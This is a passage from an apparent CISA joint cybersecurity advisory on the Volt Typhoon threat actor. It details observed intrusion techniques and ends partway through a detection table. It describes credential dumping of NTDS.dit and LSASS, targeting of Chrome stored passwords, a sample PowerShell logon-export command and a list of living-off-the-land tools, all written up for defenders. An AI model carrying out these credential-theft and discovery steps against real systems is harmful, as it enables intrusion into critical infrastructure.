3209. <p>After successfully gaining access to legitimate accounts, Volt Typhoon actors exhibit minimal activity within the compromised environment (except discovery as noted above), suggesting their objective is to maintain persistence rather than immediate exploitation. This assessment is supported by observed patterns where Volt Typhoon methodically re-targets the same organizations over extended periods, often spanning several years, to continuously validate and potentially enhance their unauthorized accesses. Evidence of their meticulous approach is seen in instances where they repeatedly exfiltrate domain credentials, ensuring access to current and valid accounts. For example, in one compromise, Volt Typhoon likely extracted <code>NTDS.dit</code> from three domain controllers in a four-year period. In another compromise, Volt Typhoon actors extracted <code>NTDS.dit</code> two times from a victim in a nine-month period.</p>
3210. <p>Industry reporting—identifying that Volt Typhoon actors are silent on the network following credential dumping and perform discovery to learn about the environment, but do not exfiltrate data—is consistent with the U.S. authoring agencies’ observations. This indicates their aim is to achieve and maintain persistence on the network. In one confirmed compromise, an industry partner observed Volt Typhoon actors dumping credentials at regular intervals.</p>
3211. <p>In addition to leveraging stolen account credentials, the actors use LOTL techniques and avoid leaving malware artifacts on systems that would cause alerts. Their strong focus on stealth and operational security allows them to maintain long-term, undiscovered persistence. Further, Volt Typhoon’s operational security is enhanced by targeted log deletion to conceal their actions within the compromised environment.</p>
3212. <p>See the below sections for Volt Typhoon TTPs observed by the U.S. authoring agencies from multiple confirmed Volt Typhoon compromises.</p>
3213. <h4><strong>Observed TTPs</strong></h4>
3214. <h5><em><strong>Reconnaissance</strong></em></h5>
3215. <p>Volt Typhoon actors conduct extensive pre-compromise reconnaissance [<a href="https://attack.mitre.org/versions/v14/tactics/TA0043/" title="Reconnaissance">TA0043</a>] to learn about the target organization [<a href="https://attack.mitre.org/versions/v14/techniques/T1591/" title="Gather Victim Org Information">T1591</a>], its network [<a href="https://attack.mitre.org/versions/v14/techniques/T1590/" title="Gather Victim Network Information">T1590</a>], and its staff [<a href="https://attack.mitre.org/versions/v14/techniques/T1589/" title="Gather Victim Identity Information">T1589</a>]. This includes web searches [<a href="https://attack.mitre.org/versions/v14/techniques/T1593/" title="Search Open Websites/Domains">T1593</a>]—including victim-owned sites [<a href="https://attack.mitre.org/versions/v14/techniques/T1594/" title="Search Victim-Owned Websites">T1594</a>]—for victim host [<a href="https://attack.mitre.org/versions/v14/techniques/T1592/" title="Gather Victim Host Information">T1592</a>], identity, and network information, especially for information on key network and IT administrators. According to industry reporting, Volt Typhoon actors use FOFA[<a href="https://fofa.info/" title="FOFA Search Engine">1</a>], Shodan, and Censys for querying or searching for exposed infrastructure. In some instances, the U.S. authoring agencies have observed Volt Typhoon actors targeting the personal emails of key network and IT staff [<a href="https://attack.mitre.org/versions/v14/techniques/T1589/002/" title="Gather Victim Identity Information: Email Addresses">T1589.002</a>] post compromise.</p>
3216. <h5><em><strong>Resource Development</strong></em></h5>
3217. <p>Historically, Volt Typhoon actors use multi-hop proxies for command and control (C2) infrastructure [<a href="https://attack.mitre.org/versions/v14/techniques/T1090/003/" title="Proxy: Multi-hop Proxy">T1090.003</a>]. The proxy is typically composed of virtual private servers (VPSs) [<a href="https://attack.mitre.org/versions/v14/techniques/T1583/005/" title="Acquire Infrastructure: Botnet">T1583.003</a>] or small office/home office (SOHO) routers. Recently, Volt Typhoon actors used Cisco and NETGEAR end-of-life SOHO routers implanted with KV Botnet malware to support their operations [<a href="https://attack.mitre.org/versions/v14/techniques/T1584/005/" title="Compromise Infrastructure: Botnet">T1584.005</a>]. (See DOJ press release <a href="https://www.justice.gov/opa/pr/us-government-disrupts-botnet-peoples-republic-china-used-conceal-hacking-critical" title="U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure">U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure</a> for more information).</p>
3218. <h5><em><strong>Initial Access</strong></em></h5>
3219. <p>To obtain initial access [<a href="https://attack.mitre.org/versions/v14/tactics/TA0001/" title="Initial Access">TA0001</a>], Volt Typhoon actors commonly exploit vulnerabilities in networking appliances such as those from Fortinet, Ivanti Connect Secure (formerly Pulse Secure), NETGEAR, Citrix, and Cisco [<a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>]. They often use publicly available exploit code for known vulnerabilities [<a href="https://attack.mitre.org/versions/v14/techniques/T1588/005/" title="Obtain Capabilities: Exploits">T1588.005</a>] but are also adept at discovering and exploiting zero-day vulnerabilities [<a href="https://attack.mitre.org/versions/v14/techniques/T1587/004/" title="Develop Capabilities: Exploits">T1587.004</a>].</p>
3220. <ul>
3221. <li>In one confirmed compromise, Volt Typhoon actors likely obtained initial access by exploiting <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-42475" title="CVE-2022-42475">CVE-2022-42475</a> in a network perimeter FortiGate 300D firewall that was not patched. There is evidence of a buffer overflow attack identified within the Secure Sockets Layer (SSL)-VPN crash logs.</li>
3222. </ul>
3223. <p>Once initial access is achieved, Volt Typhoon actors typically shift to establishing persistent access [<a href="https://attack.mitre.org/versions/v14/tactics/TA0003/" title="Persistence">TA0003</a>]. They often use VPN sessions to securely connect to victim environments [<a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a>], enabling discreet follow-on intrusion activities. This tactic not only provides a stable foothold in the network but also allows them to blend in with regular traffic, significantly reducing their chances of detection.</p>
3224. <h5><em><strong>Execution</strong></em></h5>
3225. <p>Volt Typhoon actors rarely use malware for post-compromise execution. Instead, once Volt Typhoon actors gain access to target environments, they use hands-on-keyboard activity via the command-line [<a href="https://attack.mitre.org/versions/v14/techniques/T1059/" title="Command and Scripting Interpreter">T1059</a>] and other native tools and processes on systems [<a href="https://attack.mitre.org/versions/v14/techniques/T1218/" title="System Binary Proxy Execution">T1218</a>] (often referred to as “LOLBins”), known as LOTL, to maintain and expand access to the victim networks. According to industry reporting, some “commands appear to be exploratory or experimental, as the operators [i.e., malicious actors] adjust and repeat them multiple times.”[<a href="https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/" title="Volt Typhoon targets US critical infrastructure with living-off-the-land techniques">2</a>]</p>
3226. <p>For more details on LOTL activity, see the Credential Access and Discovery sections and Appendix A: Volt Typhoon LOTL Activity.</p>
3227. <p>Similar to LOTL, Volt Typhoon actors also use legitimate but outdated versions of network admin tools. For example, in one confirmed compromise, actors downloaded [<a href="https://attack.mitre.org/versions/v14/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>] an outdated version of <code>comsvcs.dll</code> on the DC in a non-standard folder. <code>comsvcs.dll</code> is a legitimate Microsoft Dynamic Link Library (DLL) file normally found in the <code>System32</code> folder. The actors used this DLL with <code>MiniDump</code> and the process ID of the Local Security Authority Subsystem Service (LSASS) to dump the LSASS process memory [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a>] and obtain credentials (LSASS process memory space contains hashes for the current user’s operating system (OS) credentials).</p>
3228. <p>The actors also use legitimate non-native network admin and forensic tools. For example, Volt Typhoon actors have been observed using Magnet RAM Capture (MRC) version 1.20 on domain controllers. MRC is a free imaging tool that captures the physical memory of a computer, and Volt Typhoon actors likely used it to analyze in-memory data for sensitive information (such as credentials) and in-transit data not typically accessible on disk. Volt Typhoon actors have also been observed implanting Fast Reverse Proxy (FRP) for command and control.[<a href="https://github.com/fatedier/frp" title="fatedier / frp">3</a>] (See the Command and Control section).</p>
3229. <h5><em><strong>Persistence</strong></em></h5>
3230. <p>Volt Typhoon primarily relies on valid credentials for persistence [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a>].</p>
3231. <h5><em><strong>Defense Evasion</strong></em></h5>
3232. <p>Volt Typhoon has strong operational security. Their actors primarily use LOTL for defense evasion [<a href="https://attack.mitre.org/versions/v14/tactics/TA0005/" title="Defense Evasion">TA0005</a>], which allows them to camouflage their malicious activity with typical system and network behavior, potentially circumventing simplistic endpoint security capabilities. For more information, see joint guide <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living off the Land Techniques">Identifying and Mitigating Living off the Land Techniques</a>.</p>
3233. <p>Volt Typhoon actors also obfuscate their malware. In one confirmed compromise, Volt Typhoon obfuscated FRP client files (<code>BrightmetricAgent.exe</code> and <code>SMSvcService.exe</code>) and the command-line port scanning utility ScanLine by packing the files with Ultimate Packer for Executables (UPX) [<a href="https://attack.mitre.org/versions/v14/techniques/T1027/002/" title="Obfuscated Files or Information: Software Packing">T1027.002</a>]. FRP client applications support encryption, compression, and easy token authentication and work across multiple protocols—including transmission control protocol (TCP), user datagram protocol (UDP), hypertext transfer protocol (HTTP), and hypertext transfer protocol secure (HTTPS). The FRP client applications use the Kuai connection protocol (KCP) for error-checked and anonymous data stream delivery over UDP, with packet-level encryption support. See Appendix C and CISA Malware Analysis Report <a href="https://www.cisa.gov/news-events/analysis-reports/ar24-038a" title="MAR-10448362-1.v1 Volt Typhoon">(MAR)-10448362-1.v1</a> for more information.</p>
3234. <p>In addition to LOTL and obfuscation techniques, Volt Typhoon actors have been observed selectively clearing Windows Event Logs [<a href="https://attack.mitre.org/versions/v14/techniques/T1070/001/" title="Indicator Removal: Clear Windows Event Logs">T1070.001</a>], system logs, and other technical artifacts to remove evidence [<a href="https://attack.mitre.org/versions/v14/techniques/T1070/009/" title="Indicator Removal: Clear Persistence">T1070.009</a>] of their intrusion activity and masquerading file names [<a href="https://attack.mitre.org/versions/v14/techniques/T1036/005/" title="Masquerading: Match Legitimate Name or Location">T1036.005</a>].</p>
3235. <h5><em><strong>Credential Access</strong></em></h5>
3236. <p>Volt Typhoon actors first obtain credentials from public-facing appliances after gaining initial access by exploiting privilege escalation vulnerabilities [<a href="https://attack.mitre.org/versions/v14/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068</a>] in the operating system or network services.<strong> </strong>In some cases, they have obtained credentials insecurely stored on the appliance [<a href="https://attack.mitre.org/versions/v14/techniques/T1552/" title="Unsecured Credentials">T1552</a>]. In one instance, where Volt Typhoon likely exploited CVE-2022-42475 in an unpatched Fortinet device, Volt Typhoon actors compromised a domain admin account stored inappropriately on the device.</p>
3237. <p>Volt Typhoon also consistently obtains valid credentials by extracting the Active Directory database file (<code>NTDS.dit</code>)—in some cases multiple times from the same victim over long periods [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/003/" title="OS Credential Dumping: NTDS">T1003.003</a>]. <code>NTDS.dit</code> contains usernames, hashed passwords, and group memberships for all domain accounts, essentially allowing for full domain compromise if the hashes can be cracked offline.</p>
3238. <p>To obtain <code>NTDS.dit</code>, the U.S. authoring agencies have observed Volt Typhoon:</p>
3239. <ol>
3240. <li>Move laterally [<a href="https://attack.mitre.org/versions/v14/tactics/TA0008/" title="Lateral Movement">TA0008</a>] to the domain controller via an interactive RDP session using a compromised account with domain administrator privileges [<a href="https://attack.mitre.org/versions/v14/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol">T1021.001</a>];</li>
3241. <li>Execute the Windows-native <code>vssadmin</code> [<a href="https://attack.mitre.org/versions/v14/techniques/T1006/" title="Direct Volume Access">T1006</a>] command to create a volume shadow copy;</li>
3242. <li>Use Windows Management Instrumentation Console (WMIC) commands [<a href="https://attack.mitre.org/versions/v14/techniques/T1047/" title="Windows Management Instrumentation">T1047</a>] to execute <code>ntdsutil</code> (a LOTL utility) to copy <code>NTDS.dit</code> and <code>SYSTEM</code> registry hive from the volume shadow copy; and</li>
3243. <li>Exfiltrate [<a href="https://attack.mitre.org/versions/v14/tactics/TA0010/" title="Exfiltration">TA0010</a>] <code>NTDS.dit</code> and <code>SYSTEM</code> registry hive to crack passwords offline) [<a href="https://attack.mitre.org/versions/v14/techniques/T1110/002/" title="Brute Force: Password Cracking">T1110.002</a>]. (For more details, including specific commands used, see Appendix A: Volt Typhoon LOTL Activity.)<br><strong>Note:</strong> A volume shadow copy contains a copy of all the files and folders that exist on the specified volume. Each volume shadow copy created on a DC includes its <code>NTDS.dit</code> and the <code>SYSTEM</code> registry hive, which provides keys to decrypt the <code>NTDS.dit</code> file.</li>
3244. </ol>
3245. <p>Volt Typhoon actors have also been observed interacting with a PuTTY application by enumerating existing stored sessions [<a href="https://attack.mitre.org/versions/v14/techniques/T1012/" title="Query Registry">T1012</a>]. Given this interaction and the exposure of cleartext-stored proxy passwords used in remote administration, Volt Typhoon actors potentially had access to PuTTY profiles that allow access to critical systems (see the Lateral Movement section).</p>
3246. <p>According to industry reporting, Volt Typhoon actors attempted to dump credentials through LSASS (see Appendix B for commands used).[<a href="https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/" title="Volt Typhoon targets US critical infrastructure with living-off-the-land techniques">2</a>]</p>
3247. <p>The U.S. authoring agencies have observed Volt Typhoon actors leveraging <a href="https://attack.mitre.org/versions/v14/software/S0002/" title="Mimikatz">Mimikatz</a> to harvest credentials, and industry partners have observed Volt Typhoon leveraging <a href="https://attack.mitre.org/software/S0357/" title="Impacket">Impacket</a><u>.</u>[<a href="https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/" title="Volt Typhoon targets US critical infrastructure with living-off-the-land techniques">2</a>]</p>
3248. <ul>
3249. <li>Mimikatz is a credential dumping tool and Volt Typhoon actors use it to obtain credentials. In one confirmed compromise, the Volt Typhoon used RDP to connect to a server and run Mimikatz after leveraging a compromised administrator account to deploy it.</li>
3250. <li>Impacket is an open source Python toolkit for programmatically constructing and manipulating network protocols. It contains tools for Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks—as well as remote service execution.</li>
3251. </ul>
3252. <h5><em><strong>Discovery</strong></em></h5>
3253. <p>Volt Typhoon actors have been observed using commercial tools, LOTL utilities, and appliances already present on the system for system information [<a href="http://attack.mitre.org/versions/v14/techniques/T1082/" title="System Information Discovery">T1082</a>], network service [<a href="https://attack.mitre.org/versions/v14/techniques/T1046/" title="Network Service Discovery">T1046</a>], group [<a href="https://attack.mitre.org/versions/v14/techniques/T1069/" title="Permission Groups Discovery">T1069</a>] and user [<a href="https://attack.mitre.org/versions/v14/techniques/T1033/" title="System Owner/User Discovery">T1033</a>] discovery.</p>
3254. <p>Volt Typhoon uses at least the following LOTL tools and commands for system information, network service, group, and user discovery techniques:</p>
3255. <table>
3256. <tbody>
3257. <tr>
3258. <td>
3259. <ul>
3260. <li>cmd</li>
3261. <li>certutil</li>
3262. <li>dnscmd</li>
3263. <li>ldifde</li>
3264. <li>makecab</li>
3265. <li>net user/group/use</li>
3266. <li>netsh</li>
3267. </ul>
3268. </td>
3269. <td>
3270. <ul>
3271. <li>nltest</li>
3272. <li>netstat</li>
3273. <li>ntdsutil</li>
3274. <li>ping</li>
3275. <li>PowerShell</li>
3276. <li>quser</li>
3277. <li>reg query/reg save</li>
3278. </ul>
3279. </td>
3280. <td>
3281. <ul>
3282. <li>systeminfo</li>
3283. <li>tasklist</li>
3284. <li>wevtutil</li>
3285. <li>whoami</li>
3286. <li>wmic</li>
3287. <li>xcopy</li>
3288. </ul>
3289. </td>
3290. </tr>
3291. </tbody>
3292. </table>
3293. <p>Some observed specific examples of discovery include:</p>
3294. <ul>
3295. <li>Capturing successful logon events [<a href="https://attack.mitre.org/versions/v14/techniques/T1654/" title="Log Enumeration">T1654</a>].
3296. <ul>
3297. <li>Specifically, in one incident, analysis of the PowerShell console history of a domain controller indicated that security event logs were directed to a file named <code>user.dat</code>, as evidenced by the executed command <code>Get-EventLog security -instanceid 4624 -after [year-month-date] | fl * | Out-File 'C:\users\public\documents\user.dat'</code>. This indicates the group's specific interest in capturing successful logon events (event ID <code>4624</code>) to analyze user authentication patterns within the network. Additionally, file system analysis, specifically of the Master File Table (MFT), uncovered evidence of a separate file, <code>systeminfo.dat</code>, which was created in <code>C:\Users\Public\Documents</code> but subsequently deleted [<a href="https:/attack.mitre.org/versions/v14/techniques/T1070/004/" title="Indicator Removal: File Deletion">T1070.004</a>]. The presence of these activities suggests a methodical approach by Volt Typhoon actors in collecting and then possibly removing traces of sensitive log information from the compromised system.</li>
3298. </ul>
3299. </li>
3300. <li>Executing<code> tasklist /v</code> to gather a detailed process listing [<a href="https://attack.mitre.org/versions/v14/techniques/T1057/" title="Process Discovery">T1057</a>], followed by executing <code>taskkill /f /im rdpservice.exe</code> (the function of this executable is not known).</li>
3301. <li>Executing <code>net user</code> and <code>quser</code> for user account information [<a href="https://attack.mitre.org/versions/v14/techniques/T1087/001/">T1087.001</a>].</li>
3302. <li>Creating and accessing a file named <code>rult3uil.log</code> on a domain controller in <code>C:\Windows\System32\</code>. The <code>rult3uil.log</code> file contained user activities on a compromised system, showcasing a combination of window title information [<a href="https://attack.mitre.org/versions/v14/techniques/T1010/" title="Application Window Discovery">T1010</a>] and focus shifts, keypresses, and command executions across Google Chrome and Windows PowerShell, with corresponding timestamps.</li>
3303. <li>Employing <code>ping</code> with various IP addresses to check network connectivity [<a href="https://attack.mitre.org/versions/v14/techniques/T1016/001/" title="System Network Configuration Discovery: Internet Connection Discovery">T1016.001</a>] and <code>net start</code> to list running services [<a href="https://attack.mitre.org/versions/v14/techniques/T1007/" title="System Service Discovery">T1007</a>].</li>
3304. </ul>
3305. <p>See Appendix A for additional LOTL examples.</p>
3306. <p>In one confirmed compromise, Volt Typhoon actors attempted to use Advanced IP Scanner, which was on the network for admin use, to scan the network.</p>
3307. <p>Volt Typhoon actors have been observed strategically targeting network administrator web browser data—focusing on both browsing history and stored credentials [<a href="https://attack.mitre.org/versions/v14/techniques/T1555/003/" title="Credentials from Password Stores: Credentials from Web Browsers">T1555.003</a>]—to facilitate targeting of personal email addresses (see the Reconnaissance section) for further discovery and possible network modifications that may impact the threat actor’s persistence within victim networks.</p>
3308. <p>In one confirmed compromise:</p>
3309. <ul>
3310. <li>Volt Typhoon actors obtained the history file from the <code>User Data</code> directory of a network administrator user’s Chrome browser. To obtain the history file, Volt Typhoon actors first executed an RDP session to the user’s workstation where they initially attempted, and failed, to obtain the <code>C$ File Name: users\{redacted}\appdata\local\Google\Chrome\UserData\default\History</code> file, as evidenced by the accompanying <code>1016</code> (reopen failed) SMB error listed in the application event log. The threat actors then disconnected the RDP session to the workstation and accessed the file <code>C:\Users\{redacted}\Downloads\History.zip</code>. This file presumably contained data from the User Data directory of the user’s Chrome browser, which the actors likely saved in the Downloads directory for exfiltration [<a href="https://attack.mitre.org/versions/v14/techniques/T1074/" title="Data Staged">T1074</a>]. Shortly after accessing the <code>history.zip</code> file, the actors terminated RDP sessions.</li>
3311. <li>About four months later, Volt Typhoon actors accessed the same user’s Chrome data <code>C$ File Name: Users\{redacted}\AppData\Local\Google\Chrome\User Data\Local State</code> and <code>$ File Name: Users\{redacted}\AppData\Local\Google\Chrome\User Data\Default\Login Data</code> via SMB. The Local State file contains the Advanced Encryption Standard (AES) encryption key [<a href="https://attack.mitre.org/versions/v14/techniques/T1552/004/" title="Unsecured Credentials: Private Keys">T1552.004</a>] used to encrypt the passwords stored in the Chrome browser, which would enable the actors to obtain plaintext passwords stored in the Login Data file in the Chrome browser.</li>
3312. </ul>
3313. <p>In another confirmed compromise, Volt Typhoon actors accessed directories containing Chrome and Edge user data on multiple systems. Directory interaction was observed over the network to paths such as <code>C:\Users\{redacted}\AppData\Local\Google\Chrome\User Data\</code> and <code>C:\Users\{redacted}\AppData\Local\Microsoft\Edge\User Data\</code>. They also enumerated several directories, including directories containing vulnerability testing and cyber related content and facilities data, such as construction drawings [<a href="https://attack.mitre.org/versions/v14/techniques/T1083/" title="File and Directory Discovery">T1083</a>].</p>
3314. <h5><em><strong>Lateral Movement</strong></em></h5>
3315. <p>For lateral movement, Volt Typhoon actors have been observed predominantly employing RDP with compromised valid administrator credentials. <strong>Note:</strong> With a full on-premises Microsoft Active Directory identity compromise (see the Credential Access section), the group may be capable of using other methods such as Pass the Hash or Pass the Ticket for lateral movement [<a href="https://attack.mitre.org/versions/v14/techniques/T1550/" title="Use Alternate Authentication Material">T1550</a>].</p>
3316. <p>In one confirmed compromise of a Water and Wastewater Systems Sector entity, after obtaining initial access, Volt Typhoon actors connected to the network via a VPN with administrator credentials they obtained and opened an RDP session with the same credentials to move laterally. Over a nine-month period, they moved laterally to a file server, a domain controller, an Oracle Management Server (OMS), and a VMware vCenter server. The actors obtained domain credentials from the domain controller and performed discovery, collection, and exfiltration on the file server (see the Discovery and Collection and Exfiltration sections).</p>
3317. <p>Volt Typhoon’s movement to the vCenter server was likely strategic for pre-positioning to OT assets. The vCenter server was adjacent to OT assets, and Volt Typhoon actors were observed interacting with the PuTTY application on the server by enumerating existing stored sessions. With this information, Volt Typhoon potentially had access to a range of critical PuTTY profiles, including those for water treatment plants, water wells, an electrical substation, OT systems, and network security devices. This would enable them to access these critical systems [<a href="https://attack.mitre.org/versions/v14/techniques/T1563/" title="Remote Service Session Hijacking">T1563</a>]. See Figure 2.</p>
3318.  
3319.  
3320.  
3321. <figure class="c-figure c-figure--image" role="group">
3322.  
3323.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%202%20-%20Volt%20Typhoon%20Lateral%20Movement%20Path%20File%20Server%2C%20DC%2C%20and%20OT-Adjacent%20Assets.png?itok=RmbI_O55" width="1024" height="539" alt="Figure 2: Volt Typhoon Lateral Movement Path File Server, DC, and OT-Adjacent Assets">
3324.  
3325.  
3326.  
3327. </div>
3328.      <figcaption class="c-figure__caption"><em>Figure 2: Volt Typhoon Lateral Movement Path File Server, DC, and OT-Adjacent Assets</em></figcaption>
3329.  </figure>
3330. <p>Additionally, Volt Typhoon actors have been observed using PSExec to execute remote processes, including the automated acceptance of the end-user license agreement (EULA) through an administrative account, signified by the <code>accepteula</code> command flag.</p>
3331. <p>Volt Typhoon actors may have attempted to move laterally to a cloud environment in one victim’s network but direct attribution to the Volt Typhoon group was inconclusive. During the period of the their known network presence, there were anomalous login attempts to an Azure tenant [<a href="https://attack.mitre.org/versions/v14/techniques/T1021/007/" title="Remote Services: Cloud Services">T1021.007</a>] potentially using credentials [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/004/" title="Valid Accounts: Cloud Accounts">T1078.004</a>] previously compromised from theft of <code>NTDS.dit</code>. These attempts, coupled with misconfigured virtual machines with open RDP ports, suggested a potential for cloud-based lateral movement. However, subsequent investigations, including password changes and multifactor authentication (MFA) implementations, revealed authentication failures from non-associated IP addresses, with no definitive link to Volt Typhoon.</p>
3332. <h5><em><strong>Collection and Exfiltration</strong></em></h5>
3333. <p>The U.S. authoring agencies assess Volt Typhoon primarily collects information that would facilitate follow-on actions with physical impacts. For example, in one confirmed compromise, they collected [<a href="https://attack.mitre.org/versions/v14/tactics/TA0009/" title="Collection">TA0009</a>] sensitive information obtained from a file server in multiple zipped files [<a href="https://attack.mitre.org/versions/v14/techniques/T1560/" title="Archive Collected Data">T1560</a>] and likely exfiltrated [<a href="https://attack.mitre.org/versions/v14/tactics/TA0010/" title="Exfiltration">TA0010</a>] the files via Server Message Block (SMB) [<a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a>] (see Figure 3). Collected information included diagrams and documentation related to OT equipment, including supervisory control and data acquisition (SCADA) systems, relays, and switchgear. This data is crucial for understanding and potentially impacting critical infrastructure systems, indicating a focus on gathering intelligence that could be leveraged in actions targeting physical assets and systems.</p>
3334.  
3335.  
3336.  
3337. <figure class="c-figure c-figure--image" role="group">
3338.  
3339.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%203%20-%20Volt%20Typhoon%20Attack%20Path%20for%20Exfiltration%20of%20Data%20from%20File%20Server.png?itok=vlIAWkqg" width="1024" height="538" alt="Figure 3: Volt Typhoon Attack Path for Exfiltration of Data from File Server">
3340.  
3341.  
3342.  
3343. </div>
3344.      <figcaption class="c-figure__caption"><em>Figure 3: Volt Typhoon Attack Path for Exfiltration of Data from File Server</em></figcaption>
3345.  </figure>
3346. <p>In another compromise, Volt Typhoon actors leveraged WMIC to create and use temporary directories (<code>C:\Users\Public\pro</code>, <code>C:\Windows\Temp\tmp</code>, <code>C:\Windows\Temp\tmp\Active Directory</code> and <code>C:\Windows\Temp\tmp\registry</code>) to stage the extracted <code>ntds.dit</code> and <code>SYSTEM</code> registry hives from <code>ntdsutil</code> execution volume shadow copies (see the Credential Access section) obtained from two DCs. They then compressed and archived the extracted <code>ntds.dit</code> and accompanying registry files by executing <code>ronf.exe</code>, which was likely a renamed version of the archive utility <code>rar.exe</code>) [<a href="https://attack.mitre.org/versions/v14/techniques/T1560/001/" title="Archive Collected Data: Archive via Utility">T1560.001</a>].</p>
3347. <h4><strong>Command and Control</strong></h4>
3348. <p>Volt Typhoon actors have been observed leveraging compromised SOHO routers and virtual private servers (VPS) to proxy C2 traffic. For more information, see DOJ press release <a href="https://www.justice.gov/opa/pr/us-government-disrupts-botnet-peoples-republic-china-used-conceal-hacking-critical" title="U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure">U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure</a>).</p>
3349. <p>They have also been observed setting up FRP clients [<a href="https://attack.mitre.org/versions/v14/techniques/T1090/" title="Proxy">T1090</a>] on a victim’s corporate infrastructure to establish covert communications channels [<a href="https://attack.mitre.org/versions/v14/techniques/T1573/" title="Encrypted Channel">T1573</a>] for command and control. In one instance, Volt Typhoon actors implanted the FRP client with filename <code>SMSvcService.exe</code> on a Shortel Enterprise Contact Center (ECC) server and a second FRP client with filename <code>Brightmetricagent.exe</code> on another server. These clients, when executed via PowerShell [<a href="https://attack.mitre.org/versions/v14/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>], open reverse proxies between the compromised system and Volt Typhoon C2 servers. <code>Brightmetricagent.exe</code> has additional capabilities. The FRP client can locate servers behind a network firewall or obscured through Network Address Translation (NAT) [<a href="https://attack.mitre.org/versions/v14/techniques/T1016/" title="System Network Configuration Discovery">T1016</a>]. It also contains multiplexer libraries that can bi-directionally stream data over NAT networks and contains a command-line interface (CLI) library that can leverage command shells such as PowerShell, Windows Management Instrumentation (WMI), and Z Shell (zsh) [<a href="https://attack.mitre.org/versions/v14/techniques/T1059/004" title="Command and Scripting Interpreter: Unix Shell">T1059.004</a>]. See Appendix C and <a href="https://www.cisa.gov/news-events/analysis-reports/ar24-038a" title="MAR-10448362-1.v1 Volt Typhoon">MAR-10448362-1.v1</a> for more information.</p>
3350. <p>In the same compromise, Volt Typhoon actors exploited a Paessler Router Traffic Grapher (PRTG) server as an intermediary for their FRP operations. To facilitate this, they used the netsh command, a legitimate Windows command, to create a PortProxy registry modification [<a href="https://attack.mitre.org/versions/v14/techniques/T1112" title="Modify Registry">T1112</a>] on the PRTG server [<a href="https://attack.mitre.org/techniques/T1090/001/" title="Proxy: Internal Proxy">T1090.001</a>]. This key alteration redirected specific port traffic to Volt Typhoon’s proxy infrastructure, effectively converting the PRTG’s server into a proxy for their C2 traffic [<a href="https://attack.mitre.org/versions/v14/techniques/T1584/004/" title="Compromise Infrastructure: Server">T1584.004</a>] (see Appendix B for details).</p>
3351. <h3><strong>DETECTION/HUNT RECOMMENDATIONS</strong></h3>
3352. <h4><strong>Apply Living off the Land Detection Best Practices</strong></h4>
3353. <p><strong>Apply the prioritized detection and hardening best practice recommendations provided in joint guide </strong><a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living off the Land Techniques"><strong>Identifying and Mitigating Living off the Land Techniques</strong></a>. Many organizations lack security and network management best practices (such as established baselines) that support detection of malicious LOTL activity—this makes it difficult for network defenders to discern legitimate behavior from malicious behavior and conduct behavior analytics, anomaly detection, and proactive hunting. Conventional IOCs associated with the malicious activity are generally lacking, complicating network defenders’ efforts to identify, track, and categorize this sort of malicious behavior. This advisory provides guidance for a multifaceted cybersecurity strategy that enables behavior analytics, anomaly detection, and proactive hunting, which are part of a comprehensive approach to mitigating cyber threats that employ LOTL techniques.</p>
3354. <p>Review Application, Security, and System Event Logs</p>
3355. <p><strong>Routinely review application, security, and system event logs, focusing on Windows Extensible Storage Engine Technology (ESENT) Application Logs</strong>. Due to Volt Typhoon’s ability for long-term undetected persistence, network defenders should assume significant dwell time and review specific application event log IDs, which remain on endpoints for longer periods compared to security event logs and other ephemeral artifacts. Focus on Windows ESENT logs because certain ESENT Application Log event IDs (<code>216</code>, <code>325</code>, <code>326</code>, and <code>327</code>) may indicate actors copying <code>NTDS.dit</code>.</p>
3356. <p>See Table 1 for examples of ESENT and other key log indicators that should be investigated. Please note that incidents may not always have exact matches listed in the Event Detail column due to variations in event logging and TTPs.</p>
3357. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
3358. <caption><em>Table 1: Key Log Indicators for Detecting Volt Typhoon Activity</em></caption>
3359. <thead>
3360. <tr>
3361. <th role="columnheader" data-tablesaw-priority="persist"><strong>Event ID (Log)</strong></th>
3362. <th role="columnheader"><strong>Event Detail</strong></th>
3363. <th role="columnheader"><strong>Description</strong></th>
3364. </tr>
3365. </thead>
3366. <tbody>
3367. <tr>
3368. <td>216 (Windows ESENT Application Log)</td>
3369. <td>A database location change was detected from 'C:\Windows\NTDS\ntds.dit' to '\\?\GLOBALROOT\Device\{redacted}VolumeShadowCopy1\Windows\NTDS\ntds.dit'</td>
3370. <td>A change in the <code>NTDS.dit</code> database location is detected. This could suggest an initial step in NTDS credential dumping where the database is being prepared for extraction.</td>
3371. </tr>
3372. <tr>
